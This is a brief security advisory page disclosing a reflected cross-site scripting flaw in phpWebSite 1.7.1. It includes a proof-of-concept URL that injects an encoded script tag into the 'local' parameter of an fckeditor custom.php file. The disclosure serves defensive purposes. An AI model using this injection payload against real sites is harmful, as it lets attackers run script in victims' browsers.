Home
Consulting
Advisories
Software
Articles
Contact

phpWebSite 1.7.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in phpWebSite 1.7.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E


Copyright © 2018 AutoSec Tools LLC